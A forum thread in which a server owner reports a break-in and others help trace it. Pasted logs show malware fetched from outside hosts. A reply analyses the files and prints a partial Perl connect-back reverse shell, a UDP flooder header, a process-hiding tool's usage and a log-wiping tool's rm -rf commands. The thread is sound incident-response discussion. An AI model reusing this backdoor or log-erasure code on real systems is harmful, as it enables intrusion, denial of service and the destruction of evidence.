# I have been hacked

## marquischan

Some guys put a udp.pl and keep it running continous to make my network BUSY.

I don't how he can get in and how to prevent this again. What can i do?

----------

## asiobob

where is the file located? is it /tmp ?/

I'd probably rebuild the box.

What services are you running (as in what programs are you running that open ports)

----------

## marquischan

Yes, in the tmp directory. You will rebuild the box if you were me?

How can he get in

I just opened ssh, ftp, apache, subversion, pptp 's port only

----------

## wynn

NeddySeagoon has suggested mounting /tmp noexec for just this reason.

----------

## asiobob

what "ftp" (what program and version), is it correctly configured in terms of security.

Also the noexec option would have prevented the script from executing (but tmp has to be in its own partition of that), however it could be that the script is not executing rather the attacker is actually running /usr/bin/perl with udp.pl being an input, in that case it's perl that is executing and so the noexec does nothing.

You have to find out *how* they got in. You say Apache, but is there PHP / PERL / anything else scripts in use like a blog, forum, image gallery etc... then one of those programs could be compromised, your FTP server might be configured incorrectly, you should look at every log file you can, for an example the apache log and ftp log, take what you read with a grain of salt, the attacker could have modified them -- it depends on the level of compromise. We could make assumptions but in security assumptions are bad

----------

## marquischan

I am using Pureftpd for the latest version... ... !!!

----------

## marquischan

I just remember that the perl file is under the user "apache"

----------

## Markus H

 *marquischan wrote:*   

> I just remember that the perl file is under the user "apache"

 

the file was probably upload from the webserver because of the file owner(apache).

if you have the /tmp as a own partion you could secure it.

edit your /etc/fstab and add noexec to options. This will prevent user from executing files from the /tmp directory.

run this to check for more files that can be executed from the /tmp directory(does files shouldn't be there)

find /tmp -exec file {} \; | egrep -i '(script|exec)'

if you found any, you should remove them.

if you are using php i would recommend you using phpsuexec. it will make php run as cgi, and all files will be uploaded as the current user not as the user the webserver is running under.

if it was uploaded from ftp it shouldn't say that the file owner is apache. it should say ftp or the login name to the ftp server.

----------

## marquischan

It seems that the file is uploaded by apache and I am using PHP at the same time also.

However, is it related to subversion? subversion also use user: apache

I know that PHP will handle the uploaded files in /tmp . 

Is there any way to prevent it from changing / running / remoting?

The uploaded files should not be CHANGED / RUN using PHP and Apache ... ...

----------

## Fadoksi

Does "noexec" help in this case? Aren't they just executing perl, and just reading the script?

----------

## Markus H

it depends on how they executed the script.

i'm trying to execute a perl script under /tmp directory. see what happens:

# ./perl.pl 

./perl.pl: Permission denied.

and i'm logged on as root.

but this dosen't prevent you from running script outside the directory.

you can easily execute the script by doing this:

# perl /tmp/perl.pl

hello world

the code is executed.

this can also be executed from php with the function system();

to prevent it be executed from php you can turn php in safe_mode or just turn off this function.

marquischan:

do you have any other users on the server that have access to public a website on your server?

if not i don't think that was the security hole then.

----------

## marquischan

Everybody can go to the website and upload things to share their things ... ... it is a public site... ...

Although some may need to login but the situation is the same... ....

----------

## phorn

You may want to look in the logs for any related entries.

The apache log is in /usr/lib/apache2/logs/access_log

You should be able to look for entries around the ctime or mtime of the file in /tmp

ls -l --time=ctime /tmp/udp.pl

I had my server hacked through a hole from awstats (from a bot).  It managed to wipe every file/directory containing *log* (root-owned) and every file named *index* (for vandalism), so I'm not sure if some part of apache was running under root, or if it used a local kernel exploit to gain priviliges.

Unless you lost your logs, you sohuld be able to see what caused this to happen (you may be able to search for udp.pl to see if it was embeded into the GET string).

You may also want to secure your scripts a little better (maybe write down all services and web-applications, cgi scripts, etc. you have running, and what people have access to each one.

Most likely this was a bot, so it was probably a public part of your site.

I would suspect it came in through a Apache-based script like PHP or perl.  FTP can't run executables easily, so I do not think that is the cause.  However if you give users FTP access to a directory listed under a server root, or also in their home direcotyr (~/public_html) then it is easy to run scripts like this from anywhere the user has access to (not just /tmp), so that's a possibility.

You can use 

```
who /var/log/wtmp
```

 to see the times your users have logged in, and look for a date before the script was placed in /tmp.

Anyway, this may be a good time to go though all your code and see where possible problems might be there.

----------

## wynn

More security: there's a note at http://lwn.net/Articles/191510/ on the /proc vulnerability, mounting /proc nosuid,noexec is recommended.

More on /tmp: what are your recommendations on cleaning /tmp, does it help security or is it just being tidy?

----------

## marquischan

I checked the log

[Tue Jul 11 16:34:13 2006] [notice] Apache configured -- resuming normal operations

--08:57:47--  http://hyberner.net/dc.txt

           => `dc.txt.2'

Resolving hyberner.net... 142.217.199.251

Connecting to hyberner.net[142.217.199.251]:80... connected.

HTTP request sent, awaiting response... 404 Not Found

08:57:52 ERROR 404: Not Found.

Unable to Connect

--12:51:32--  http://xpl.netmisphere2.com/r0nin

           => `r0nin'

Resolving xpl.netmisphere2.com... 82.237.120.143

Connecting to xpl.netmisphere2.com[82.237.120.143]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 24,379 [application/x-executable]

    0K .......... .......... ...                             100% 24.6K

12:51:34 (24.59 KB/s) - `r0nin' saved [24,379/24,379]

--12:52:00--  http://paullemes.brtdata.com.br/bd.txt

           => `bd.txt'

Resolving paullemes.brtdata.com.br... 200.199.201.215

Connecting to paullemes.brtdata.com.br[200.199.201.215]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 11,688 [text/plain]

    0K .......... .                                          100% 14.7K

12:52:02 (14.69 KB/s) - `bd.txt' saved [11,688/11,688]

--12:56:53--  http://xpl.netmisphere2.com/dc.txt

           => `dc.txt.2'

Resolving xpl.netmisphere2.com... 82.237.120.143

Connecting to xpl.netmisphere2.com[82.237.120.143]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 2,100 [text/plain]

    0K ..                                                    100%  256K

12:56:54 (249.12 KB/s) - `dc.txt.2' saved [2,100/2,100]

--12:59:01--  http://xpl.netmisphere2.com/dc.txt

           => `dc.txt.3'

Resolving xpl.netmisphere2.com... 82.237.120.143

Connecting to xpl.netmisphere2.com[82.237.120.143]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 2,100 [text/plain]

    0K ..                                                    100%  205K

12:59:02 (193.82 KB/s) - `dc.txt.3' saved [2,100/2,100]

--12:59:56--  http://paullemes.brtdata.com.br/udp.pl

           => `udp.pl'

Resolving paullemes.brtdata.com.br... 200.199.201.215

Connecting to paullemes.brtdata.com.br[200.199.201.215]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 1,148 [text/plain]

    0K .                                                     100%

12:59:57 (19.91 MB/s) - `udp.pl' saved [1,148/1,148]

[Sun Jul 16 17:18:37 2006] [notice] Apache configured -- resuming normal operations

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

sh: -c: line 0: unexpected EOF while looking for matching `"'

sh: -c: line 1: syntax error: unexpected end of file

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

--07:44:38--  http://dochell.altervista.org/httpd

           => `httpd'

Resolving dochell.altervista.org... 207.44.182.97

Connecting to dochell.altervista.org[207.44.182.97]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 219,325 [text/plain]

    0K .......... .......... .......... .......... ..........   47.09 KB/s 23%

   50K .......... .......... .......... .......... ..........  161.59 KB/s 46%

  100K .......... .......... .......... .......... ..........  232.08 KB/s 70%

  150K .......... .......... .......... .......... ..........  232.94 KB/s 93%

  200K .......... ....                                       100%  240K

07:44:42 (115.06 KB/s) - `httpd' saved [219,325/219,325]

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

--07:45:12--  http://dochell.altervista.org/xh

           => `xh'

Resolving dochell.altervista.org... 207.44.182.97

Connecting to dochell.altervista.org[207.44.182.97]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 15,125 [text/plain]

    0K .......... ....                                       100% 27.6K

07:45:13 (27.58 KB/s) - `xh' saved [15,125/15,125]

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

--07:45:29--  http://dochell.altervista.org/del

           => `del'

Resolving dochell.altervista.org... 207.44.182.97

Connecting to dochell.altervista.org[207.44.182.97]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 7,806 [text/plain]

    0K .......                                               100% 28.0K

07:45:29 (27.97 KB/s) - `del' saved [7,806/7,806]

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

--07:45:44--  http://dochell.altervista.org/now

           => `now'

Resolving dochell.altervista.org... 207.44.182.97

Connecting to dochell.altervista.org[207.44.182.97]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 4,838 [text/plain]

    0K ....                                                  100% 18.2K

07:45:45 (18.19 KB/s) - `now' saved [4,838/4,838]

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

--07:48:25--  http://dochell.altervista.org/httpd

           => `httpd'

Resolving dochell.altervista.org... 207.44.182.97

Connecting to dochell.altervista.org[207.44.182.97]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 219,325 [text/plain]

    0K .......... .......... .......... .......... ..........   47.09 KB/s 23%

   50K .......... .......... .......... .......... ..........  161.49 KB/s 46%

  100K .......... .......... .......... .......... ..........  233.12 KB/s 70%

  150K .......... .......... .......... .......... ..........  229.41 KB/s 93%

  200K .......... ....                                       100%  253K

07:48:27 (115.11 KB/s) - `httpd' saved [219,325/219,325]

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

error: "kern.ostype" is an unknown key

error: "kern.osrelease" is an unknown key

----------

## phorn

It looks like your box has been owned, unless you have proper permissions.

You should definitely use your power as root and delete all those binaries, and kill all processes that don't look familiar...

Your log is interesting in that you should never see output from wget in your logs... that means that someone is injecting stuff into the scripts. If you use php or perl make sure to check ALL untrusted input -- it may pass a string into exec() or something of that sort.

Also, I don't think you are looking at the right log.

You should look at the access_log file (hopefully you had that enabled).

That should contain the complete HTTP query at the time, not just the output of the command (look for 12:56, as shown in the wget output, for example).  It would give you an indicator about what script was compromised.

If you use external scripts like awstats, make sure that they were up-to-date.

dc.txt is a backdoor program -- seems to call system('/bin/sh'):

```
print "--== ConnectBack Backdoor Shell vs 1.0"

if ($ARGC!=2) { 

   print "Usage: $0 [Host] [Port] \n\n"; 

   die "Ex: $0 127.0.0.1 2121 \n"; 

} 

use Socket; 

use FileHandle; 

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 

connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 

print "[*] Resolving HostName\n";

print "[*] Connecting... $ARGV[0] \n"; 

print "[*] Spawning Shell \n";

print "[*] Connected to remote host \n";

SOCKET->autoflush(); 

open(STDIN, ">&SOCKET"); 

open(STDOUT,">&SOCKET"); 

open(STDERR,">&SOCKET"); 

system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;

system($system);
```

bd.txt is a perl file that allows others to remotely telnet to your box, probably under apache account (I assume without password)

```
#!/usr/bin/perl

# Telnet-like Standard Daemon 0.7
```

Here is the udp.pl file from that URL:

```
#!/usr/bin/perl

#####################################################

# udp flood.

```

From the contents, it seems to not do anything intellegently,-- it just tries to waste bandwidth...

That httpd binary appears to be a program called iroffer (from strings).

The xh is a "process faker" from strings:

```
XHide - Process Faker, by Schizoprenic Xnuxer Research (c) 2002

Options:

-s string Fake name process

-d  Run aplication as daemon/system (optional)

-u uid[:gid] Change UID/GID, use another user (optional)

-p filename Save PID to filename (optional)

Example: %s -s "klogd -m 0" -d -p test.pid ./egg bot.conf
```

del is a program that deletes apache logs  -- this may be responsible for missing logs (again, they should not be writable by a user like apache, but who knows)

I'm pasting the whole strings output so you can look for those files that it references.

```
Erasing the logs... 

Fase 1: fast and easy log del

export HISTFILE=/dev/null

export HISTFILE=/dev/null - done

rm -rf /var/log/lastlog

|+| /var/log/lastlog - erased

rm -rf /var/log/wtmp

|+| /var/log/wtmp - erased

rm -rf /etc/wtmp

|+| /etc/wtmp - erased

rm -rf /var/run/utmp

|+| /var/run/utmp - erased

rm -rf /etc/utmp

|+| /etc/utmp - erased

rm -rf /var/log

|+| /var/log - erased

rm -rf /var/logs

|+| /var/logs - erased

rm -rf /var/adm

|+| /var/adm - erased

rm -rf /var/apache/log

|+| /var/apache/log - erased

rm -rf /var/apache/logs

|+| /var/apache/logs - erased

rm -rf /usr/local/apache/log

|+| /usr/local/apache/log - erased

rm -rf /usr/local/apache/logs

|+| /usr/local/apache/logs - erased

rm -rf /root/.bash_history

|+| /root/.bash_history - erased

rm -rf /root/.sh_history

|+| /root/.sh_history - erased

rm -rf /root/.ksh_history

|+| /root/.ksh_history - erased

rm -rf $HISTFILE

|+| $HISTFILE - erased

Fase 2: too long and del all log files

find / -name .bash_history -exec rm -rf {} \;

|+| all .bash_history - erased

find / -name .bash_logout -exec rm -rf {} \;

|+| all .bash_logout - erased

find / -name log* -exec rm -rf {} \;

|+| all log* - erased

find / -name *.log -exec rm -rf {} \;

|+| all *.log - erased

find / -name $HISTFILE -exec rm -rf {} \;

|+| all $HISTFILE - erased

|+| ------- Done, all log files are erased
```

Anyway, that should give you an idea of what those binaries have done or are doing to your system.  You may want to watch out if you see anything that requires root (writing into /tmp does not require root), because then the hackers are likely cracking your password hashes (and may have your password if they installed a keylogger).

----------

